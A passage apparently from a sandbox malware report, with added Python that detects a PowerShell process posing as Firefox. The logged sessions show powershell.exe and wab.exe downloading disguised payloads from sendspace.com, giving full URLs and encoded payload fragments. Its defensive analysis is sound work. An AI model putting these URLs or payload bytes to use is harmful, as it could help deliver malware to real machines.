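    flows = flows_by_host(SAMPLE_ROWS, "192.168.2.5", "1.1.1.1", DNS_ANSWERS)
    for key, n in sorted(flows.items()):
        print(n, "packets", key)
```

Both hints are needed: `192.168.2.569.31.136.17` splits legally as either `192.168.2.5 | 69.31.136.17` or `192.168.2.56 | 9.31.136.17`, and only the known-address check settles it; a row with neither a known port nor a known address (the constructed `1234567810.0.0.110.0.0.1` case in the test) is reported as ambiguous rather than guessed. Run over the rows above, the join shows port 49713 talking to www.sendspace.com and port 49714 to fs03n2.sendspace.com, the host resolved by the third DNS query at 18:25:47.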
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.5 | 49704 | 104.21.28.80 | 443 | 1988 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-05-23 16:25:05 UTC | 174 | OUT | GET /pro/dl/7dhid7 HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: www.sendspace.com
                                        Connection: Keep-Alive
                                        2024-05-23 16:25:06 UTC | 946 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Thu, 23 May 2024 16:25:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: SID=u0as7mg90cv48ga5n1g7rvv7f0; path=/; domain=.sendspace.com
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Pragma: no-cache
                                        Location: https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDi5H1cm7jX4gBHMn04sd2%2BoEaORZ49uL3UwcdjAFi4xNEpQcJOCe66ZKu5enXprmmfXguT%2BhfPsHs58TF%2BYsbtB7%2BE58DTPuhTTgKLAZ1vJmDiThtPcX%2Fp1%2FcAiT2ErIUk6pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 888666645a91c445-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-05-23 16:25:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0
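The two HTTP sessions in this report form a short download chain: powershell.exe (PID 1988) fetches a sendspace.com share link while presenting a Firefox User-Agent, receives a 301 to a file host, and pulls a 412172-byte `application/octet-stream` attachment named `Castrate.xtp`. The script below is an added example written for this page, not Joe Sandbox code; it reconstructs the two message heads from the session tables (body bytes omitted), extracts those chain facts, and flags the process/User-Agent mismatch that the report's "Uses a known web browser user agent" signature refers to. The table mapping UA families to the process images expected to send them, and the list of extensions that would be unremarkable for a download, are this example's own assumptions.

```python
"""Pull the download chain out of the HTTP sessions a sandbox logged and
flag the process/User-Agent mismatch visible in this report.

Example code written for this page; it is not Joe Sandbox code. The two
message heads below are reconstructed from the report's HTTP session
tables (body bytes omitted). The browser-to-image table and the list of
unsurprising extensions are this example's own assumptions.
"""
import re
from urllib.parse import urlsplit

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FIREFOX_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) "
              "Gecko/20100101 Firefox/121.0")

# Session 0 (to 104.21.28.80) and session 1 (to 69.31.136.57), as logged.
SESSIONS = [
    {"process": POWERSHELL, "dst": "104.21.28.80",
     "request": ("GET /pro/dl/7dhid7 HTTP/1.1\r\n"
                 f"User-Agent: {FIREFOX_UA}\r\n"
                 "Host: www.sendspace.com\r\n"
                 "Connection: Keep-Alive\r\n\r\n"),
     "response": ("HTTP/1.1 301 Moved Permanently\r\n"
                  "Content-Type: text/html; charset=UTF-8\r\n"
                  "Location: https://fs13n1.sendspace.com/dlpro/"
                  "008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp\r\n"
                  "Server: cloudflare\r\n\r\n")},
    {"process": POWERSHELL, "dst": "69.31.136.57",
     "request": ("GET /dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/"
                 "Castrate.xtp HTTP/1.1\r\n"
                 f"User-Agent: {FIREFOX_UA}\r\n"
                 "Host: fs13n1.sendspace.com\r\n"
                 "Connection: Keep-Alive\r\n\r\n"),
     "response": ("HTTP/1.1 200 OK\r\n"
                  "Server: nginx\r\n"
                  "Content-Type: application/octet-stream\r\n"
                  "Content-Length: 412172\r\n"
                  "Content-Disposition: attachment;filename=\"Castrate.xtp\"\r\n\r\n")},
]

# Which process images are expected to send which UA family (assumption).
UA_FAMILY_IMAGES = {
    "Firefox/": {"firefox.exe"},
    "Edg/": {"msedge.exe"},
    "Chrome/": {"chrome.exe", "msedge.exe"},
}
# Extensions a downloaded attachment would not be remarkable for (assumption).
UNSURPRISING_EXT = {"zip", "pdf", "exe", "msi", "docx", "xlsx", "txt", "png", "jpg"}


def parse_head(raw):
    """Return (start line, {lowercased header name: value}) of an HTTP/1.1 head."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def ua_process_mismatch(user_agent, process_path):
    """True when a browser-family UA is sent by an image that is not that browser."""
    image = process_path.rsplit("\\", 1)[-1].lower()
    for token, images in UA_FAMILY_IMAGES.items():
        if token in user_agent:
            return image not in images
    return False


def analyze(sessions):
    """Walk the sessions in order and collect chain facts and findings."""
    result = {"chain": [], "ua_mismatch": [], "redirects": [],
              "attachments": [], "uncommon_ext": []}
    for n, s in enumerate(sessions):
        req_line, req = parse_head(s["request"])
        status_line, resp = parse_head(s["response"])
        _method, path, _ver = req_line.split(" ", 2)
        status = int(status_line.split(" ")[1])
        host = req.get("host", s["dst"])
        result["chain"].append((s["dst"], f"https://{host}{path}", status))
        if ua_process_mismatch(req.get("user-agent", ""), s["process"]):
            result["ua_mismatch"].append(n)
        if 300 <= status < 400 and "location" in resp:
            target = urlsplit(resp["location"]).hostname
            if target != host:
                result["redirects"].append((host, target))
        m = re.search(r'filename="?([^";]+)"?', resp.get("content-disposition", ""))
        if m:
            name = m.group(1)
            size = int(resp.get("content-length", "0"))
            result["attachments"].append((name, size, resp.get("content-type", "")))
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext not in UNSURPRISING_EXT:
                result["uncommon_ext"].append(ext)
    return result


if __name__ == "__main__":
    for key, value in analyze(SESSIONS).items():
        print(f"{key}: {value}")
```

The mismatch check is keyed on the process image recorded in the session table, which is why it is worth correlating proxy or sandbox HTTP logs with process telemetry rather than judging the User-Agent alone: the header is indistinguishable from a real Firefox 121 request. The redirect check only records hops that change host, so the share-link-to-file-host pattern stands out while same-host redirects stay quiet.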


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.5 | 49705 | 69.31.136.57 | 443 | 1988 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-05-23 16:25:06 UTC | 231 | OUT | GET /dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: fs13n1.sendspace.com
                                        Connection: Keep-Alive
                                        2024-05-23 16:25:07 UTC | 497 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Thu, 23 May 2024 16:25:06 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 412172
                                        Last-Modified: Wed, 15 May 2024 07:37:51 GMT
                                        Connection: close
                                        Set-Cookie: SID=26gkib6ma0o7nhfe3go65aodf3; path=/; domain=.sendspace.com
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Content-Disposition: attachment;filename="Castrate.xtp"
                                        ETag: "6644664f-64a0c"
                                        Accept-Ranges: bytes
                                        2024-05-23 16:25:07 UTC | 15887 | IN | Data Raw: 36 77 4b 49 47 75 73 43 47 32 4b 37 58 71 45 50 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 6f 66 68 43 44 75 73 43 65 5a 64 78 41 5a 75 42 38 63 6a 47 58 71 74 78 41 5a 74 78 41 5a 75 42 36 57 6b 2b 48 4b 58 72 41 6c 37 52 36 77 4c 6e 67 6e 45 42 6d 2b 73 43 73 69 71 36 75 6a 30 65 34 33 45 42 6d 2b 73 43 32 75 78 78 41 5a 76 72 41 71 34 72 4d 63 72 72 41 71 7a 31 63 51 47 62 69 52 51 4c 36 77 4b 64 6f 65 73 43 4a 58 33 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 4f 73 43 36 73 56 78 41 5a 75 42 2b 57 49 52 30 77 46 38 79 2b 73 43 43 66 7a 72 41 6f 62 6a 69 30 51 6b 42 4f 73 43 71 6e 35 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 4c 46 57 42 77 39 61 4d 47 67 48 72 41 70 53 5a 63 51 47 62 75 70 6f 32 79 4d 7a 72 41 73 36 2b 63 51 47
                                        Data Ascii: 6wKIGusCG2K7XqEPAHEBm3EBmwNcJARxAZtxAZu5ofhCDusCeZdxAZuB8cjGXqtxAZtxAZuB6Wk+HKXrAl7R6wLngnEBm+sCsiq6uj0e43EBm+sC2uxxAZvrAq4rMcrrAqz1cQGbiRQL6wKdoesCJX3R4nEBm3EBm4PBBOsC6sVxAZuB+WIR0wF8y+sCCfzrAobji0QkBOsCqn5xAZuJw3EBm+sCLFWBw9aMGgHrApSZcQGbupo2yMzrAs6+cQG
                                        2024-05-23 16:25:07 UTC | 16384 | IN | Data Raw: 37 39 76 50 45 6c 4f 35 36 6e 78 31 7a 4c 4a 77 4e 39 43 4f 64 48 58 4d 6a 7a 4e 67 45 5a 53 54 79 63 72 43 61 34 44 44 58 59 74 56 2b 78 79 59 4d 6c 65 34 4f 45 72 51 59 49 52 31 7a 49 35 30 64 45 4a 36 30 58 77 7a 53 6e 67 71 7a 4d 57 55 72 39 37 43 44 35 52 76 69 52 56 50 6e 31 52 57 7a 50 6e 36 42 4c 73 32 61 6d 30 7a 2b 42 78 7a 75 77 56 36 4d 42 2f 4c 49 68 37 6e 4f 76 78 7a 65 42 69 74 38 44 79 44 51 6b 74 70 45 49 35 30 64 63 79 50 79 4a 70 42 4e 73 79 46 6a 2f 2f 6a 6d 2b 6a 53 72 47 31 6c 62 70 65 7a 63 79 61 63 4f 35 66 65 2f 47 76 41 69 65 41 6a 34 76 73 51 66 63 79 50 4c 6f 33 37 71 4b 58 6e 79 31 64 54 33 39 59 41 63 36 78 71 70 77 5a 44 79 35 55 35 4b 34 70 62 4f 67 66 72 41 6e 43 37 75 70 31 5a 6d 63 63 63 6d 4e 79 47 51 6a 42 45 72 74 41
                                        Data Ascii: 79vPElO56nx1zLJwN9COdHXMjzNgEZSTycrCa4DDXYtV+xyYMle4OErQYIR1zI50dEJ60XwzSngqzMWUr97CD5RviRVPn1RWzPn6BLs2am0z+BxzuwV6MB/LIh7nOvxzeBit8DyDQktpEI50dcyPyJpBNsyFj//jm+jSrG1lbpezcyacO5fe/GvAieAj4vsQfcyPLo37qKXny1dT39YAc6xqpwZDy5U5K4pbOgfrAnC7up1ZmcccmNyGQjBErtA
                                        2024-05-23 16:25:07 UTC | 16384 | IN | Data Raw: 55 51 4e 39 52 77 35 62 42 4c 6f 6c 55 33 67 64 36 62 4a 31 50 31 30 55 4c 54 51 48 6c 63 6d 37 31 59 77 42 33 37 41 55 6a 51 35 50 46 2b 38 4b 48 38 30 7a 70 39 71 7a 76 42 77 68 65 30 70 52 43 62 4b 4a 76 57 6e 45 52 4c 52 4a 79 46 52 51 64 63 79 4f 64 48 51 6b 34 33 79 43 47 50 7a 77 61 63 6a 38 72 70 73 7a 50 74 65 5a 63 45 4b 7a 6a 67 4a 39 4b 6e 73 33 66 4d 75 31 57 66 34 30 44 69 50 6b 58 4a 63 71 76 46 32 57 51 6f 6c 2f 53 5a 55 52 52 54 73 67 62 31 74 79 74 6f 6d 37 38 36 69 56 74 6e 49 43 78 75 6a 45 38 6f 6d 35 57 68 38 6a 38 54 2b 2b 71 66 78 78 70 76 71 54 44 41 44 6c 59 4c 38 42 5a 58 6d 42 34 51 45 47 65 35 62 53 65 68 6e 4a 43 2b 4e 4b 64 30 6b 74 6a 6a 6b 67 39 66 74 2b 68 6d 56 33 6c 74 4d 4b 62 6b 37 2f 4f 64 72 52 71 43 4a 6d 71 65 52
                                        Data Ascii: UQN9Rw5bBLolU3gd6bJ1P10ULTQHlcm71YwB37AUjQ5PF+8KH80zp9qzvBwhe0pRCbKJvWnERLRJyFRQdcyOdHQk43yCGPzwacj8rpszPteZcEKzjgJ9Kns3fMu1Wf40DiPkXJcqvF2WQol/SZURRTsgb1tytom786iVtnICxujE8om5Wh8j8T++qfxxpvqTDADlYL8BZXmB4QEGe5bSehnJC+NKd0ktjjkg9ft+hmV3ltMKbk7/OdrRqCJmqeR
                                        2024-05-23 16:25:07 UTC | 16384 | IN | Data Raw: 55 70 45 4a 59 54 2b 2b 71 66 78 52 70 76 76 73 6b 75 56 79 50 47 4d 77 71 67 66 4d 35 4a 4d 68 32 53 6c 49 33 51 39 67 69 62 6d 59 41 4e 73 6c 76 6a 6b 58 31 35 41 57 72 47 64 30 70 63 53 65 68 63 79 4f 64 6e 49 6e 53 65 74 30 46 4c 42 43 69 33 79 43 64 52 79 69 71 57 74 47 38 45 4b 2f 6f 6e 74 67 4e 37 42 64 4c 55 59 2b 73 32 61 62 65 73 66 64 4b 36 66 53 66 35 61 66 55 37 68 59 71 6e 44 47 46 4e 4f 6f 78 32 39 75 62 4c 34 79 58 44 56 70 6b 53 6e 77 69 56 58 4a 7a 49 35 30 64 63 30 5a 53 41 32 70 4e 6c 38 6d 70 59 56 73 68 71 53 70 79 2b 58 5a 59 53 59 4d 6f 2b 5a 41 41 33 66 44 7a 2f 5a 31 75 6d 79 4e 48 6d 37 59 55 37 4b 67 67 31 58 49 6a 6e 58 74 38 35 4b 34 64 63 79 4f 64 48 52 31 62 66 57 4b 79 6d 36 6d 77 30 57 44 2b 5a 76 61 6f 5a 30 2f 61 76 6c
                                        Data Ascii: UpEJYT++qfxRpvvskuVyPGMwqgfM5JMh2SlI3Q9gibmYANslvjkX15AWrGd0pcSehcyOdnInSet0FLBCi3yCdRyiqWtG8EK/ontgN7BdLUY+s2abesfdK6fSf5afU7hYqnDGFNOox29ubL4yXDVpkSnwiVXJzI50dc0ZSA2pNl8mpYVshqSpy+XZYSYMo+ZAA3fDz/Z1umyNHm7YU7Kgg1XIjnXt85K4dcyOdHR1bfWKym6mw0WD+ZvaoZ0/avl
                                        2024-05-23 16:25:07 UTC | 16384 | IN | Data Raw: 64 6b 46 6d 61 63 76 4b 57 79 52 39 7a 49 34 52 7a 64 31 64 71 33 42 72 5a 6b 43 58 79 6c 73 6b 66 63 79 4f 6c 30 42 47 32 47 63 32 45 35 55 49 71 76 67 6e 63 34 76 35 33 6e 78 31 7a 56 6d 70 37 39 76 44 63 32 6e 4c 42 51 4a 59 57 52 52 6a 55 53 39 38 63 4e 4a 75 4b 78 6e 66 79 43 6a 64 41 33 64 30 63 4c 49 50 53 72 72 48 79 6e 6a 45 64 63 79 4e 2f 48 58 4d 6a 6b 70 6b 34 7a 32 4c 69 53 2b 4a 61 6d 49 41 69 6e 52 30 6c 64 6d 47 54 53 76 75 6c 7a 66 4b 6d 62 68 78 7a 49 37 6b 78 6c 69 51 63 71 49 41 69 6e 52 32 4f 5a 32 49 2f 38 71 5a 75 48 48 4d 6a 34 53 65 53 61 50 73 6b 75 4b 4e 68 44 7a 4c 63 45 4f 35 79 49 35 31 6f 68 47 49 59 33 37 51 69 33 4e 34 67 74 42 77 30 30 79 73 73 73 66 49 4b 49 78 43 6b 34 68 77 73 36 66 54 2f 6f 76 4a 65 31 66 7a 37 49 35
                                        Data Ascii: dkFmacvKWyR9zI4Rzd1dq3BrZkCXylskfcyOl0BG2Gc2E5UIqvgnc4v53nx1zVmp79vDc2nLBQJYWRRjUS98cNJuKxnfyCjdA3d0cLIPSrrHynjEdcyN/HXMjkpk4z2LiS+JamIAinR0ldmGTSvulzfKmbhxzI7kxliQcqIAinR2OZ2I/8qZuHHMj4SeSaPskuKNhDzLcEO5yI51ohGIY37Qi3N4gtBw00ysssfIKIxCk4hws6fT/ovJe1fz7I5
                                        2024-05-23 16:25:07 UTC16384INData Raw: 74 37 38 71 4f 54 4d 70 39 66 5a 6b 49 6f 47 51 41 66 4b 64 78 55 58 41 6a 78 4a 79 45 57 61 2f 50 32 71 4a 71 78 54 72 52 72 52 79 49 71 43 41 37 63 53 4f 64 65 30 72 37 57 68 35 76 57 46 77 34 38 74 6f 50 4c 69 6f 70 48 43 34 35 5a 52 43 63 6d 47 63 4e 2b 45 4e 6a 56 38 55 71 57 6d 79 4f 41 55 66 38 58 42 42 4e 44 42 78 4e 53 2f 59 7a 30 47 74 46 6f 44 6f 41 32 30 34 6e 42 42 76 42 34 38 61 74 58 62 6e 37 78 47 53 43 73 4f 39 35 45 6d 4c 2b 63 2b 49 69 6f 33 55 59 44 54 35 56 71 35 37 55 50 6a 56 77 79 54 72 31 2f 78 77 75 77 4b 53 4f 75 79 57 64 72 37 4d 59 4a 68 7a 6a 30 79 4f 64 48 58 79 74 2b 56 46 77 49 38 4f 63 63 42 35 36 66 72 49 62 63 5a 79 77 34 52 4c 5a 63 71 4a 32 6f 2f 7a 6e 6e 43 57 63 35 4a 34 30 32 56 63 78 6e 41 35 66 6e 5a 4e 7a 49 35
                                        Data Ascii: t78qOTMp9fZkIoGQAfKdxUXAjxJyEWa/P2qJqxTrRrRyIqCA7cSOde0r7Wh5vWFw48toPLiopHC45ZRCcmGcN+ENjV8UqWmyOAUf8XBBNDBxNS/Yz0GtFoDoA204nBBvB48atXbn7xGSCsO95EmL+c+Iio3UYDT5Vq57UPjVwyTr1/xwuwKSOuyWdr7MYJhzj0yOdHXyt+VFwI8OccB56frIbcZyw4RLZcqJ2o/znnCWc5J402VcxnA5fnZNzI5
                                        2024-05-23 16:25:07 UTC16384INData Raw: 6b 2b 4c 36 48 48 33 4d 6a 7a 61 56 6a 4f 6e 49 51 58 6c 42 74 49 56 38 4f 46 4e 77 65 6e 61 67 4a 46 57 65 2b 53 2b 2b 71 65 78 52 31 76 68 6a 50 44 53 77 51 53 69 45 42 76 75 6f 68 66 6d 4a 58 55 4a 2f 79 71 64 38 6b 39 62 75 2b 47 33 46 44 68 4f 52 6e 4d 72 45 69 78 52 4a 7a 4d 68 45 64 63 79 4f 64 48 52 54 6c 43 4b 68 4d 33 73 37 63 2f 4f 77 37 74 35 6a 68 51 56 33 67 51 6b 35 57 6e 6d 74 52 46 66 4e 76 64 65 53 66 62 49 7a 55 55 6b 7a 6c 74 48 58 64 59 6d 74 6a 71 4d 67 39 63 48 57 4a 6c 4d 37 30 6e 42 31 7a 71 6b 70 4b 2b 4a 35 4b 48 48 4d 6a 6b 68 78 43 4b 5a 30 64 63 79 4f 64 54 4b 4c 4f 34 6d 4b 38 71 44 69 6b 75 53 76 74 4a 47 43 34 48 30 72 4d 6b 35 4a 2f 57 36 4a 61 4e 35 39 46 4b 5a 79 45 2f 45 7a 2f 45 4b 4a 71 64 76 74 67 48 4a 79 63 54 54
                                        Data Ascii: k+L6HH3MjzaVjOnIQXlBtIV8OFNwenagJFWe+S++qexR1vhjPDSwQSiEBvuohfmJXUJ/yqd8k9bu+G3FDhORnMrEixRJzMhEdcyOdHRTlCKhM3s7c/Ow7t5jhQV3gQk5WnmtRFfNvdeSfbIzUUkzltHXdYmtjqMg9cHWJlM70nB1zqkpK+J5KHHMjkhxCKZ0dcyOdTKLO4mK8qDikuSvtJGC4H0rMk5J/W6JaN59FKZyE/Ez/EKJqdvtgHJycTT
                                        2024-05-23 16:25:07 UTC16384INData Raw: 39 4f 78 70 46 6e 4c 4b 56 61 41 33 4d 6f 6c 77 34 4e 61 39 45 54 4d 6f 41 47 61 41 61 6f 6d 53 53 63 79 4f 64 45 76 66 2b 63 52 39 7a 65 68 7a 73 41 76 78 67 2f 66 66 71 61 39 6d 4c 70 32 4a 63 4d 36 6f 51 58 48 45 6a 6e 61 54 51 33 51 6a 79 46 61 4a 6b 30 4f 79 69 62 4a 42 63 78 2f 69 63 44 6d 73 38 47 33 4d 6a 6b 70 6b 52 58 5a 30 64 38 74 49 64 35 5a 6e 79 70 64 35 4c 78 42 7a 73 33 51 6f 47 52 76 66 67 70 52 58 34 72 74 77 66 63 79 4f 53 6d 52 33 63 59 75 4c 37 72 76 51 66 63 79 4d 58 46 66 50 61 76 35 66 2b 53 70 38 64 63 31 59 37 58 62 55 6a 6b 70 79 4e 42 52 57 64 59 36 4f 74 44 55 76 45 2b 35 69 70 6f 35 31 2f 38 79 50 69 65 30 72 72 70 64 2b 77 6f 75 42 68 47 52 75 64 48 58 79 73 6b 6c 6d 4d 33 4b 58 34 46 52 37 65 58 34 58 6d 68 5a 32 4a 71 78
                                        Data Ascii: 9OxpFnLKVaA3Molw4Na9ETMoAGaAaomSScyOdEvf+cR9zehzsAvxg/ffqa9mLp2JcM6oQXHEjnaTQ3QjyFaJk0OyibJBcx/icDms8G3MjkpkRXZ0d8tId5Znypd5LxBzs3QoGRvfgpRX4rtwfcyOSmR3cYuL7rvQfcyMXFfPav5f+Sp8dc1Y7XbUjkpyNBRWdY6OtDUvE+5ipo51/8yPie0rrpd+wouBhGRudHXysklmM3KX4FR7eX4XmhZ2Jqx
                                        2024-05-23 16:25:07 UTC16384INData Raw: 55 56 59 70 49 54 54 30 63 5a 78 6e 4e 66 57 6a 32 6c 6d 6d 33 2f 42 61 33 4a 4e 4f 6b 30 52 37 52 34 7a 48 75 4a 2b 66 44 76 37 34 49 4f 4b 7a 78 56 48 42 78 4b 4b 6e 58 6b 76 51 70 30 45 69 66 51 45 63 5a 35 6e 75 50 79 4b 79 58 66 2b 68 36 6b 36 50 62 47 68 61 56 43 4a 50 66 43 37 56 44 63 73 67 63 37 4d 37 47 2f 51 2f 79 30 76 4c 72 44 5a 75 53 48 57 4c 55 6e 52 31 7a 49 35 31 62 5a 68 4f 49 6b 2f 4c 53 67 64 6d 66 43 73 36 6d 39 50 33 71 68 76 4c 51 53 32 42 50 4d 42 7a 32 49 6f 48 57 6c 53 53 2f 46 50 70 79 50 41 42 37 53 76 72 76 44 58 30 4a 7a 53 67 6b 42 38 4a 4c 78 2f 6d 78 61 53 57 47 2f 32 79 31 75 79 70 31 2b 75 2f 6f 77 63 48 2f 54 49 41 6b 6e 4f 63 77 4f 30 49 65 34 6d 55 73 45 56 62 50 49 5a 31 43 4c 45 57 6b 7a 53 68 79 46 70 41 69 49 5a
                                        Data Ascii: UVYpITT0cZxnNfWj2lmm3/Ba3JNOk0R7R4zHuJ+fDv74IOKzxVHBxKKnXkvQp0EifQEcZ5nuPyKyXf+h6k6PbGhaVCJPfC7VDcsgc7M7G/Q/y0vLrDZuSHWLUnR1zI51bZhOIk/LSgdmfCs6m9P3qhvLQS2BPMBz2IoHWlSS/FPpyPAB7SvrvDX0JzSgkB8JLx/mxaSWG/2y1uyp1+u/owcH/TIAknOcwO0Ie4mUsEVbPIZ1CLEWkzShyFpAiIZ
                                        2024-05-23 16:25:07 UTC16384INData Raw: 47 2b 46 36 39 34 73 59 76 6e 42 31 7a 33 4f 68 64 6d 38 34 52 48 33 50 63 4b 42 56 79 49 35 31 4e 79 31 6a 49 48 4e 63 57 72 46 50 78 55 36 68 74 35 68 55 39 4b 50 48 47 64 34 31 47 37 37 68 43 6c 36 71 6c 6e 73 37 6c 76 50 79 36 59 74 76 56 50 4e 35 33 52 59 78 57 33 66 58 46 72 35 38 64 66 43 4b 4a 4f 58 4d 6a 6e 52 31 7a 52 51 39 76 52 2b 78 5a 61 7a 4f 78 55 78 36 54 70 2b 6e 70 30 64 2b 4d 4b 4c 6b 35 56 32 2f 67 37 45 67 71 4b 4d 41 39 63 4f 6d 64 75 7a 6c 57 6e 66 57 6d 4a 43 46 4c 45 6e 50 35 79 68 31 7a 49 35 30 64 45 69 63 31 62 4b 51 68 32 6d 34 4c 4b 48 69 36 43 63 41 63 72 30 46 49 2b 34 6d 68 73 70 35 72 51 36 54 7a 6a 65 4d 61 48 35 44 79 4a 37 6d 51 6f 2b 54 4e 6e 45 63 48 55 75 48 49 57 42 77 78 56 36 52 4a 62 43 37 63 4b 68 31 37 49 35
                                        Data Ascii: G+F694sYvnB1z3Ohdm84RH3PcKBVyI51Ny1jIHNcWrFPxU6ht5hU9KPHGd41G77hCl6qlns7lvPy6YtvVPN53RYxW3fXFr58dfCKJOXMjnR1zRQ9vR+xZazOxUx6Tp+np0d+MKLk5V2/g7EgqKMA9cOmduzlWnfWmJCFLEnP5yh1zI50dEic1bKQh2m4LKHi6CcAcr0FI+4mhsp5rQ6TzjeMaH5DyJ7mQo+TNnEcHUuHIWBwxV6RJbC7cKh17I5


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.5 | 49713 | 104.21.28.80 | 443 | 5964 | C:\Program Files (x86)\Windows Mail\wab.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-05-23 16:25:46 UTC | 175 | OUT | GET /pro/dl/medjl1 HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: www.sendspace.com
                                        Cache-Control: no-cache
                                        2024-05-23 16:25:47 UTC | 948 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Thu, 23 May 2024 16:25:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: SID=9rlcod4jutplauo2untp3jfqk6; path=/; domain=.sendspace.com
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Pragma: no-cache
                                        Location: https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2SnVxrw3kg6Tej9AF5vj%2BXrrtaiHdJXnPVi5sL1bBMxqTZJ6Tucn7IpUFZoFITq7NXk6IN1QRxBKUIt3moncK%2FHNDoBfwJREymb%2B3XyZ7r%2FaiONXBVbjLirySeWYJwNIehkJKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 888667648aa38c75-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-05-23 16:25:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.5 | 49714 | 69.31.136.17 | 443 | 5964 | C:\Program Files (x86)\Windows Mail\wab.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-05-23 16:25:48 UTC | 304 | OUT | GET /dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Cache-Control: no-cache
                                        Host: fs03n2.sendspace.com
                                        Connection: Keep-Alive
                                        Cookie: SID=9rlcod4jutplauo2untp3jfqk6
                                        2024-05-23 16:25:48 UTC | 430 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Thu, 23 May 2024 16:25:48 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 536128
                                        Last-Modified: Wed, 15 May 2024 07:36:44 GMT
                                        Connection: close
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Content-Disposition: attachment;filename="lLQuXHVIIjCqr119.bin"
                                        ETag: "6644660c-82e40"
                                        Accept-Ranges: bytes
